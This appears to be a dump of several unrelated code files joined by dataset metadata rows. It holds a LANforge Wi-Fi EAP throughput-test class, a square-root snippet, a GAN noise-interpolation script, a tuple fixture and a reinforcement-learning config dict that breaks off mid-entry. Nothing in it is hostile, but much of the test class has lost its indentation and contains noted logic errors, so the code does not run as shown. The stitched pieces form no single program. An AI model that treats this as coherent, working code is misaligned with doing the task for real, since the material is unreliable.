    def __init__(self, host, port, security=None, ssid=None, sta_list=None, number_template="00000", _debug_on=False, _dut_bssid="",
                 _exit_on_error=False, _sta_name=None, _resource=1, radio="wiphy0", key_mgmt="WPA-EAP", eap="", identity="",
                 ttls_passwd="", hessid=None, ttls_realm="", domain="", _exit_on_fail=False, _cleanup_on_exit=True):
        """Configure a single-client throughput test using 802.1X/EAP credentials."""
        super().__init__(host, port, _debug=_debug_on, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
        self.host = host
        self.port = port
        self.ssid = ssid
        self.radio = radio
        self.security = security
        #self.password = password
        self.sta_list = sta_list
        # EAP/802.1X credentials; passed through to set_wifi_extra() in setup().
        self.key_mgmt = key_mgmt
        self.eap = eap
        self.identity = identity
        self.ttls_passwd = ttls_passwd
        self.ttls_realm = ttls_realm
        self.domain = domain
        self.hessid = hessid
        self.dut_bssid = _dut_bssid
        self.timeout = 120
        self.number_template = number_template
        self.debug = _debug_on
        self.local_realm = realm.Realm(lfclient_host=self.host, lfclient_port=self.port)
        # NOTE(review): this profile is configured here but self.station_profile
        # is reset to None near the end of __init__, discarding this setup --
        # confirm which assignment is intended.
        self.station_profile = self.local_realm.new_station_profile()
        self.station_profile.lfclient_url = self.lfclient_url
        self.station_profile.ssid = self.ssid
        self.station_profile.security = self.security
        self.station_profile.number_template_ = self.number_template
        self.station_profile.mode = 0
        #Added to test_ipv4_ttls code
        self.upstream_url = None # defer construction
        self.sta_url_map = None
        self.upstream_resource = None
        self.upstream_port = "eth2"
        self.station_names = []
        if _sta_name is not None:
            self.station_names = [_sta_name]
        self.localrealm = Realm(lfclient_host=host, lfclient_port=port)
        self.resource = _resource
        self.cleanup_on_exit = _cleanup_on_exit
        self.resulting_stations = {}
        self.resulting_endpoints = {}
        # NOTE(review): self.runtime_secs is never set in this class even though
        # udp_unidirectional()/tcp_unidirectional() read it -- callers must
        # assign it before running traffic. Confirm.
        self.station_profile = None
        self.l3_udp_profile = None
        self.l3_tcp_profile = None
# def get_realm(self) -> Realm: # py > 3.6
def get_realm(self):
return self.localrealm
def get_station_url(self, sta_name_=None):
if sta_name_ is None:
raise ValueError("get_station_url wants a station name")
if self.sta_url_map is None:
self.sta_url_map = {}
for sta_name in self.station_names:
self.sta_url_map[sta_name] = "port/1/%s/%s" % (self.resource, sta_name)
return self.sta_url_map[sta_name_]
def get_upstream_url(self):
if self.upstream_url is None:
self.upstream_url = "port/1/%s/%s" % (self.upstream_resource, self.upstream_port)
return self.upstream_url
# Compare pre-test values to post-test values
def compare_vals(self, name, postVal, print_pass=False, print_fail=True):
# print(f"Comparing {name}")
if postVal > 0:
self._pass("%s %s" % (name, postVal), print_pass)
else:
self._fail("%s did not report traffic: %s" % (name, postVal), print_fail)
def remove_stations(self):
for name in self.station_names:
LFUtils.removePort(self.resource, name, self.lfclient_url)
def num_associated(self, bssid):
counter = 0
# print("there are %d results" % len(self.station_results))
fields = "_links,port,alias,ip,ap,port+type"
self.station_results = self.localrealm.find_ports_like("eap*", fields, debug_=False)
if (self.station_results is None) or (len(self.station_results) < 1):
self.get_failed_result_list()
for eid,record in self.station_results.items():
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
#pprint(eid)
#pprint(record)
if record["ap"] == bssid:
counter += 1
#print("-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ")
return counter
def clear_test_results(self):
self.resulting_stations = {}
self.resulting_endpoints = {}
super().clear_test_results()
#super(StaConnect, self).clear_test_results().test_results.clear()
    def setup(self):
        """Validate the upstream port, remove stale stations, then build EAP
        stations via set_wifi_extra() using the credentials from __init__.

        Returns False when the upstream port cannot be queried or has no IP
        address; otherwise falls through after requesting station creation.
        """
        self.clear_test_results()
        self.check_connect()
        upstream_json = self.json_get("%s?fields=alias,phantom,down,port,ip" % self.get_upstream_url(), debug_=False)
        if upstream_json is None:
            self._fail(message="Unable to query %s, bye" % self.upstream_port, print_=True)
            return False
        if upstream_json['interface']['ip'] == "0.0.0.0":
            if self.debug:
                pprint.pprint(upstream_json)
            self._fail("Warning: %s lacks ip address" % self.get_upstream_url(), print_=True)
            return False
        # remove old stations
        print("Removing old stations")
        for sta_name in self.station_names:
            sta_url = self.get_station_url(sta_name)
            response = self.json_get(sta_url)
            if (response is not None) and (response["interface"] is not None):
                for sta_name in self.station_names:
                    LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
        LFUtils.wait_until_ports_disappear(self.lfclient_url, self.station_names)
        # Create stations and turn dhcp on
        self.station_profile = self.localrealm.new_station_profile()
        # Build stations
        self.station_profile.use_security(self.security, self.ssid, passwd="[BLANK]")
        self.station_profile.set_number_template(self.number_template)
        print("Creating stations")
        self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
        self.station_profile.set_command_param("set_port", "report_timer", 1500)
        self.station_profile.set_command_flag("set_port", "rpt_timer", 1)
        # Apply the 802.1X/EAP parameters captured in __init__.
        self.station_profile.set_wifi_extra(key_mgmt=self.key_mgmt, eap=self.eap, identity=self.identity,
                                            passwd=self.ttls_passwd,
                                            realm=self.ttls_realm, domain=self.domain,
                                            hessid=self.hessid)
        self.station_profile.create(radio=self.radio, sta_names_=self.sta_list, debug=self.debug, use_radius=True, hs20_enable=False)
        self._pass("PASS: Station build finished")
def start(self):
if self.station_profile is None:
self._fail("Incorrect setup")
pprint.pprint(self.station_profile)
if self.station_profile.up is None:
self._fail("Incorrect station profile, missing profile.up")
if self.station_profile.up == False:
print("\nBringing ports up...")
data = {"shelf": 1,
"resource": self.resource,
"port": "ALL",
"probe_flags": 1}
self.json_post("/cli-json/nc_show_ports", data)
self.station_profile.admin_up()
LFUtils.waitUntilPortsAdminUp(self.resource, self.lfclient_url, self.station_names)
# station_info = self.jsonGet(self.mgr_url, "%s?fields=port,ip,ap" % (self.getStaUrl()))
duration = 0
maxTime = 100
ip = "0.0.0.0"
ap = ""
print("Waiting for %s stations to associate to AP: " % len(self.station_names), end="")
connected_stations = {}
while (len(connected_stations.keys()) < len(self.station_names)) and (duration < maxTime):
duration += 3
time.sleep(10)
print(".", end="")
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
station_info = self.json_get(sta_url + "?fields=port,ip,ap")
# LFUtils.debug_printer.pprint(station_info)
if (station_info is not None) and ("interface" in station_info):
if "ip" in station_info["interface"]:
ip = station_info["interface"]["ip"]
if "ap" in station_info["interface"]:
ap = station_info["interface"]["ap"]
if (ap == "Not-Associated") or (ap == ""):
if self.debug:
print(" -%s," % sta_name, end="")
else:
if ip == "0.0.0.0":
if self.debug:
print(" %s (0.0.0.0)" % sta_name, end="")
else:
connected_stations[sta_name] = sta_url
data = {
"shelf":1,
"resource": self.resource,
"port": "ALL",
"probe_flags": 1
}
self.json_post("/cli-json/nc_show_ports", data)
for sta_name in self.station_names:
sta_url = self.get_station_url(sta_name)
station_info = self.json_get(sta_url) # + "?fields=port,ip,ap")
if station_info is None:
print("unable to query %s" % sta_url)
self.resulting_stations[sta_url] = station_info
ap = station_info["interface"]["ap"]
ip = station_info["interface"]["ip"]
if (ap != "") and (ap != "Not-Associated"):
print(" %s +AP %s, " % (sta_name, ap), end="")
if self.dut_bssid != "":
if self.dut_bssid.lower() == ap.lower():
self._pass(sta_name+" connected to BSSID: " + ap)
# self.test_results.append("PASSED: )
# print("PASSED: Connected to BSSID: "+ap)
else:
self._fail("%s connected to wrong BSSID, requested: %s Actual: %s" % (sta_name, self.dut_bssid, ap))
else:
self._fail(sta_name+" did not connect to AP")
return False
if ip == "0.0.0.0":
self._fail("%s did not get an ip. Ending test" % sta_name)
else:
self._pass("%s connected to AP: %s With IP: %s" % (sta_name, ap, ip))
if self.passes() == False:
if self.cleanup_on_exit:
print("Cleaning up...")
self.remove_stations()
return False
def udp_profile(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu):
# Create UDP endpoint - Alex's code!
self.l3_udp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_udp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_udp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_udp_tput_profile.side_a_min_pdu = side_a_min_pdu
self.l3_udp_tput_profile.side_b_min_pdu = side_b_min_pdu
self.l3_udp_tput_profile.report_timer = 1000
self.l3_udp_tput_profile.name_prefix = "udp"
self.l3_udp_tput_profile.create(endp_type="lf_udp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
def tcp_profile(self, side_a_min_bps, side_b_min_bps):
# Create TCP endpoints - original code!
self.l3_tcp_tput_profile = self.localrealm.new_l3_cx_profile()
self.l3_tcp_tput_profile.side_a_min_bps = side_a_min_bps
self.l3_tcp_tput_profile.side_b_min_bps = side_b_min_bps
self.l3_tcp_tput_profile.name_prefix = "tcp"
self.l3_tcp_tput_profile.report_timer = 1000
self.l3_tcp_tput_profile.create(endp_type="lf_tcp",
side_a=list(self.localrealm.find_ports_like("tput+")),
side_b="%d.%s" % (self.resource, self.upstream_port),
suppress_related_commands=True)
# Start UDP Downstream Traffic
def udp_throughput(self):
print("\nStarting UDP Traffic")
self.l3_udp_tput_profile.start_cx()
time.sleep(1)
self.l3_udp_tput_profile.refresh_cx()
def tcp_throughput(self):
print("\nStarting TCP Traffic")
self.l3_tcp_tput_profile.start_cx()
time.sleep(1)
self.l3_tcp_tput_profile.refresh_cx()
def udp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_udp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_udp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_udp_tput_profile.created_cx)
# print("\n")
def tcp_stop(self):
# stop cx traffic
print("Stopping CX Traffic")
self.l3_tcp_tput_profile.stop_cx()
# Refresh stats
print("\nRefresh CX stats")
self.l3_tcp_tput_profile.refresh_cx()
print("Sleeping for 5 seconds")
time.sleep(5)
# get data for endpoints JSON
return self.collect_client_stats(self.l3_tcp_tput_profile.created_cx)
# print("\n")
# New Endpoint code to print TX and RX numbers
def collect_client_stats(self, endp_map):
print("Collecting Data")
fields="?fields=name,tx+bytes,rx+bytes"
for (cx_name, endps) in endp_map.items():
try:
endp_url = "/endp/%s%s" % (endps[0], fields)
endp_json = self.json_get(endp_url)
self.resulting_endpoints[endp_url] = endp_json
ptest_a_tx = endp_json['endpoint']['tx bytes']
ptest_a_rx = endp_json['endpoint']['rx bytes']
# ptest = self.json_get("/endp/%s?fields=tx+bytes,rx+bytes" % cx_names[cx_name]["b"])
endp_url = "/endp/%s%s" % (endps[1], fields)
endp_json = self.json_get(endp_url)
self.resulting_endpoints[endp_url] = endp_json
ptest_b_tx = endp_json['endpoint']['tx bytes']
ptest_b_rx = endp_json['endpoint']['rx bytes']
byte_values = []
byte_values.append("Station TX: " + str(ptest_a_tx))
byte_values.append("Station RX: " + str(ptest_a_rx))
byte_values.append("AP TX: " + str(ptest_b_tx))
byte_values.append("AP RX: " + str(ptest_b_rx))
return byte_values
except Exception as e:
self.error(e)
def cleanup_udp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup_tcp(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug= self.debug)
def cleanup(self):
# remove all endpoints and cxs
if self.cleanup_on_exit:
for sta_name in self.station_names:
LFUtils.removePort(self.resource, sta_name, self.lfclient_url)
curr_endp_names = []
removeCX(self.lfclient_url, self.l3_tcp_tput_profile.get_cx_names())
removeCX(self.lfclient_url, self.l3_udp_tput_profile.get_cx_names())
for (cx_name, endp_names) in self.l3_tcp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
for (cx_name, endp_names) in self.l3_udp_tput_profile.created_cx.items():
curr_endp_names.append(endp_names[0])
curr_endp_names.append(endp_names[1])
removeEndps(self.lfclient_url, curr_endp_names, debug=self.debug)
def udp_unidirectional(self, side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu, direction, values_line):
    """Run one unidirectional UDP throughput test and return the rate in Mbps.

    Builds the UDP profile with the given rates/PDU sizes, runs traffic for
    ``self.runtime_secs`` seconds, stops, and converts the selected byte
    counter into megabits per second (rounded to 2 decimals).

    ``values_line`` indexes the "Label: <bytes>" strings returned by
    ``udp_stop()`` (e.g. 1 = Station RX, 3 = AP RX per the callers).
    """
    self.udp_profile(side_a_min_bps, side_b_min_bps, side_a_min_pdu, side_b_min_pdu)
    self.start()
    print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
    self.udp_throughput()
    print("napping %f sec" % self.runtime_secs)
    time.sleep(self.runtime_secs)
    values = self.udp_stop()
    print(values)
    # Pick the requested counter entry.  (Renamed from `bytes`, which
    # shadowed the builtin.)
    counter = values[values_line]
    # "Label: N" -> N bytes -> bits -> Mbps over the run time.
    bits = int(counter.split(": ", 1)[1]) * 8
    mbps = round((bits / 1000000) / self.runtime_secs, 2)
    return mbps
def tcp_unidirectional(self, side_a_min_bps, side_b_min_bps, direction, values_line):
    """Run one unidirectional TCP throughput test and return the rate in Mbps.

    Builds the TCP profile with the given rates, runs traffic for
    ``self.runtime_secs`` seconds, stops, and converts the selected byte
    counter into megabits per second (rounded to 2 decimals).

    ``values_line`` indexes the "Label: <bytes>" strings returned by
    ``tcp_stop()`` (e.g. 1 = Station RX, 3 = AP RX per the callers).
    """
    self.tcp_profile(side_a_min_bps, side_b_min_bps)
    self.start()
    print("Running", direction, "Traffic for %s seconds" % self.runtime_secs)
    self.tcp_throughput()
    print("napping %f sec" % self.runtime_secs)
    time.sleep(self.runtime_secs)
    values = self.tcp_stop()
    print(values)
    # Pick the requested counter entry.  (Renamed from `bytes`, which
    # shadowed the builtin.)
    counter = values[values_line]
    # "Label: N" -> N bytes -> bits -> Mbps over the run time.
    bits = int(counter.split(": ", 1)[1]) * 8
    mbps = round((bits / 1000000) / self.runtime_secs, 2)
    return mbps
# ~class
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
########################## Test Code ################################
## main() performs four throughput tests on the SSID supplied via its arguments and returns a list of the measured values.
def main(ap_model, firmware, radio, ssid_name, ssid_psk, security, station, runtime):
    """Run four throughput tests (UDP/TCP x down/upstream) against ``ssid_name``.

    Returns a list of "<label>: <Mbps>" strings (or "<label>: Error" for a
    failed test).  ``ap_model`` and ``firmware`` are accepted for interface
    compatibility with callers but are not used by the measurement itself.
    """
    # -------- establish client connection --------
    singleClient = SingleClient("10.10.10.201", 8080, debug_=False)
    singleClient.sta_mode = 0
    singleClient.upstream_resource = 1
    singleClient.upstream_port = "eth2"
    singleClient.radio = radio
    singleClient.resource = 1
    singleClient.dut_ssid = ssid_name
    singleClient.dut_passwd = ssid_psk
    singleClient.dut_security = security
    singleClient.station_names = station
    singleClient.runtime_secs = runtime
    singleClient.cleanup_on_exit = True
    tput_data = []

    def _run(label, runner):
        # Run one unidirectional test and record its result.  Catch Exception
        # (not a bare `except:`) so Ctrl-C / SystemExit still abort the run.
        # Also fixes the original "TCP Uptream: Error" typo in the recorded
        # result string.
        try:
            mbps = runner()
            print(label + ":", mbps, "Mbps")
            tput_data.append(label + ": " + str(mbps))
        except Exception:
            print(label + " Test Error")
            tput_data.append(label + ": Error")

    singleClient.setup()
    # values_line selects the measured counter: 1 = Station RX, 3 = AP RX.
    _run("UDP Downstream",
         lambda: singleClient.udp_unidirectional(56000, 500000000, 1200, 1500, "Downstream", 1))
    _run("UDP Upstream",
         lambda: singleClient.udp_unidirectional(500000000, 0, 1200, 1500, "Upstream", 3))
    _run("TCP Downstream",
         lambda: singleClient.tcp_unidirectional(0, 500000000, "Downstream", 1))
    _run("TCP Upstream",
         lambda: singleClient.tcp_unidirectional(500000000, 0, "Upstream", 3))
    # Remove stations, endpoints and CXs created by the tests.
    singleClient.cleanup()
    return tput_data
def eap_tput(sta_list, ssid_name, radio, security, eap_type, identity, ttls_password):
    """Run the four throughput tests (UDP/TCP x down/upstream) over an EAP association.

    Mirrors ``main()`` but connects with 802.1X credentials via
    ``SingleClientEAP``.  Returns a list of "<label>: <Mbps>" strings
    (or "<label>: Error" for a failed test).
    """
    eap_connect = SingleClientEAP("10.10.10.201", 8080, _debug_on=True)
    eap_connect.upstream_resource = 1
    eap_connect.upstream_port = "eth2"
    eap_connect.security = security
    eap_connect.sta_list = sta_list
    eap_connect.station_names = sta_list
    eap_connect.ssid = ssid_name
    eap_connect.radio = radio
    eap_connect.eap = eap_type
    eap_connect.identity = identity
    eap_connect.ttls_passwd = ttls_password
    eap_connect.runtime_secs = 10
    tput_data = []

    def _run(label, runner):
        # Run one unidirectional test and record its result.  Catch Exception
        # (not a bare `except:`) so Ctrl-C / SystemExit still abort the run.
        # Also fixes the original "TCP Uptream: Error" typo in the recorded
        # result string.
        try:
            mbps = runner()
            print(label + ":", mbps, "Mbps")
            tput_data.append(label + ": " + str(mbps))
        except Exception:
            print(label + " Test Error")
            tput_data.append(label + ": Error")

    eap_connect.setup()
    # values_line selects the measured counter: 1 = Station RX, 3 = AP RX.
    _run("UDP Downstream",
         lambda: eap_connect.udp_unidirectional(56000, 500000000, 1200, 1500, "Downstream", 1))
    _run("UDP Upstream",
         lambda: eap_connect.udp_unidirectional(500000000, 0, 1200, 1500, "Upstream", 3))
    _run("TCP Downstream",
         lambda: eap_connect.tcp_unidirectional(0, 500000000, "Downstream", 1))
    _run("TCP Upstream",
         lambda: eap_connect.tcp_unidirectional(500000000, 0, "Upstream", 3))
    # Remove stations, endpoints and CXs created by the tests.
    eap_connect.cleanup()
    return tput_data
| 42.814639
| 146
| 0.606714
| 5,843
| 45,041
| 4.380455
| 0.06726
| 0.032663
| 0.016878
| 0.015472
| 0.847626
| 0.835671
| 0.82563
| 0.817855
| 0.814026
| 0.810197
| 0
| 0.014511
| 0.280877
| 45,041
| 1,051
| 147
| 42.855376
| 0.775702
| 0.10395
| 0
| 0.818634
| 0
| 0
| 0.093662
| 0.007268
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058385
| false
| 0.03354
| 0.012422
| 0.002484
| 0.10559
| 0.101863
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53356027e1e1c532205d963aa9363c18c5588353
| 14
|
py
|
Python
|
code/sample_2-1-15.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | 1
|
2022-03-29T13:50:12.000Z
|
2022-03-29T13:50:12.000Z
|
code/sample_2-1-15.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
code/sample_2-1-15.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
# Print the square root of 9 via fractional exponentiation.
root = 9 ** 0.5
print(root)
| 7
| 13
| 0.571429
| 4
| 14
| 2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.071429
| 14
| 1
| 14
| 14
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
727601bdf896c3df2c176c804ebc8e67bab24b1e
| 2,345
|
py
|
Python
|
noiseInterp.py
|
oist/psgan
|
2b4faf1cfd1f0ced162a7e44b7d00eb58edf4a49
|
[
"MIT"
] | 1
|
2020-12-24T06:54:40.000Z
|
2020-12-24T06:54:40.000Z
|
noiseInterp.py
|
oist/psgan
|
2b4faf1cfd1f0ced162a7e44b7d00eb58edf4a49
|
[
"MIT"
] | null | null | null |
noiseInterp.py
|
oist/psgan
|
2b4faf1cfd1f0ced162a7e44b7d00eb58edf4a49
|
[
"MIT"
] | 1
|
2020-12-24T06:57:14.000Z
|
2020-12-24T06:57:14.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 12:10:41 2019

Linearly interpolate between two saved PSGAN noise tensors and save the
resulting sequence.  The commented-out path pairs select other texture
model pairs; use them together with the matching ratio range below.

@author: reiters
"""
import numpy as np

#t1=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_501_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t2=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_541_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t3=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_507_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t4=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/usedTextures/noiseBig_epoch_511_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
# FIX: the original passed 'allow_pickle' (a string) *positionally* into the
# allow_pickle slot of np.load; it only worked because a non-empty string is
# truthy.  Use the keyword explicitly.
t1 = np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_rocks1_evaluated/noiseBig_epoch_500_fc1.0_ngf80_ndf80_dep5-5.npy', allow_pickle=True)
t2 = np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_rocks1_evaluated/noiseBig_epoch_501_fc1.0_ngf80_ndf80_dep5-5.npy', allow_pickle=True)
#t1=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_crack2_evaluated/best/noiseBig_epoch_512_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t2=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_crack2_evaluated/best/noiseBig_epoch_529_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t1=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_sand2_evaluated/best/noiseBig_epoch_500_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
#t2=np.load('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_sand2_evaluated/best/noiseBig_epoch_529_fc1.0_ngf80_ndf80_dep5-5.npy',None,'allow_pickle',True)
img1Ratio = np.linspace(0, 1, 11)  # for curtain-rocks
#img1Ratio=np.linspace(0.2,0.35,11) # for curtain-crack
#img1Ratio=np.linspace(0.4,.7,11) # for curtain-sand
# FIX: the original computed `[1-ratio]*t2` -- a one-element *list* times an
# array -- which only produced the intended result via NumPy broadcasting.
# The parenthesized scalar expresses the linear blend directly.
intNoise = [ratio * t1 + (1 - ratio) * t2 for ratio in img1Ratio]
#np.save('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_crack2_evaluated/best/noiseImage1',intNoise)
#np.save('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_sand2_evaluated/best/noiseImage1',intNoise)
np.save('/gpfs/laur/sepia_tools/PSGAN_textures/best_paired_models/curtain_rocks1_evaluated/noiseImage1', intNoise)
| 71.060606
| 174
| 0.826866
| 392
| 2,345
| 4.609694
| 0.209184
| 0.057554
| 0.093525
| 0.129496
| 0.832319
| 0.832319
| 0.832319
| 0.832319
| 0.832319
| 0.831212
| 0
| 0.075165
| 0.029851
| 2,345
| 33
| 175
| 71.060606
| 0.719121
| 0.721109
| 0
| 0
| 0
| 0
| 0.594295
| 0.55626
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72bf157e393cf24cbb2df229c798e4e4c15e63c0
| 202
|
py
|
Python
|
tests/expectations/cat-x-cat-pw-idxs.py
|
Crunch-io/crunch-cube
|
80986d5b2106c774f05176fb6c6a5ea0d840f09d
|
[
"MIT"
] | 3
|
2021-01-22T20:42:31.000Z
|
2021-06-02T17:53:19.000Z
|
tests/expectations/cat-x-cat-pw-idxs.py
|
Crunch-io/crunch-cube
|
80986d5b2106c774f05176fb6c6a5ea0d840f09d
|
[
"MIT"
] | 331
|
2017-11-13T22:41:56.000Z
|
2021-12-02T21:59:43.000Z
|
tests/expectations/cat-x-cat-pw-idxs.py
|
Crunch-io/crunch-cube
|
80986d5b2106c774f05176fb6c6a5ea0d840f09d
|
[
"MIT"
] | 1
|
2021-02-19T02:49:00.000Z
|
2021-02-19T02:49:00.000Z
|
# Test-expectation fixture: a tuple of ten entries, each itself a triple of
# index tuples.  NOTE(review): presumably pairwise-comparison column indexes
# for a CAT x CAT cube (per the file's name) -- confirm against the test
# that consumes this data before relying on that interpretation.
(
    ((1,), (), ()),
    ((2,), (), ()),
    ((1, 2), (), ()),
    ((), (0,), ()),
    ((), (0,), (0,)),
    ((), (), ()),
    ((), (), ()),
    ((), (), ()),
    ((), (), ()),
    ((), (0,), (0,)),
)
| 15.538462
| 21
| 0.044554
| 9
| 202
| 1
| 0.333333
| 0.888889
| 1
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0.361386
| 202
| 12
| 22
| 16.833333
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72d6db48d214a0b8978ca3f6abcfdd1c8117c2e1
| 6,668
|
py
|
Python
|
config.py
|
hbutsuak95/iv_rl
|
0f72a8f077a238237027ea96b7d1160c35ac9959
|
[
"MIT"
] | 9
|
2022-01-16T11:27:00.000Z
|
2022-03-13T14:04:48.000Z
|
config.py
|
hbutsuak95/iv_rl
|
0f72a8f077a238237027ea96b7d1160c35ac9959
|
[
"MIT"
] | null | null | null |
config.py
|
hbutsuak95/iv_rl
|
0f72a8f077a238237027ea96b7d1160c35ac9959
|
[
"MIT"
] | null | null | null |
# Per-environment, per-algorithm hyperparameter overrides.
# Top-level keys are environment ids; second-level keys are algorithm names;
# leaves are keyword hyperparameters consumed elsewhere in the project.
# (Plain dict literal -- the original `dict({...})` wrapper was redundant.)
config = {
    "LunarLander-v2": {
        "DQN": {
            "eff_batch_size": 128,
            "eps_decay": 0.99,
            "gamma": 0.99,
            "tau": 0.005,
            "lr": 0.0005,
        },
        "EnsembleDQN": {
            "eff_batch_size": 64,
            "eps_decay": 0.99,
            "gamma": 0.99,
            "tau": 0.005,
            "lr": 0.0005,
        },
        "BootstrapDQN": {
            "eff_batch_size": 64,
            "eps_decay": 0.99,
            "gamma": 0.99,
            "tau": 0.005,
            "lr": 0.0005,
            "mask": "bernoulli",
            "mask_prob": 0.9,
            "prior_scale": 10,
        },
        "ProbDQN": {
            "eff_batch_size": 256,
            "eps_decay": 0.991,
            "gamma": 0.99,
            "tau": 0.001,
            "lr": 0.0005,
            "loss_att_weight": 2,
        },
        "IV_EnsembleDQN": {
            "eff_batch_size": 64,
            "eps_decay": 0.99,
            "gamma": 0.99,
            "tau": 0.005,
            "lr": 0.0005,
            "dynamic_eps": True,
            "minimal_eff_bs": 48,
        },
        "IV_BootstrapDQN": {
            "eff_batch_size": 64,
            "eps_decay": 0.99,
            "gamma": 0.99,
            "tau": 0.005,
            "lr": 0.0005,
            "dynamic_eps": True,
            "mask": "bernoulli",
            "mask_prob": 0.5,
            "minimal_eff_bs": 48,
            "prior_scale": 0.1,
        },
        "IV_ProbEnsembleDQN": {
            "eff_batch_size": 64,
            "eps_decay": 0.99,
            "gamma": 0.99,
            "tau": 0.005,
            "lr": 0.001,
            "eps": 10,
            "loss_att_weight": 3,
        },
        "IV_ProbDQN": {
            "eff_batch_size": 256,
            "eps_decay": 0.991,
            "gamma": 0.99,
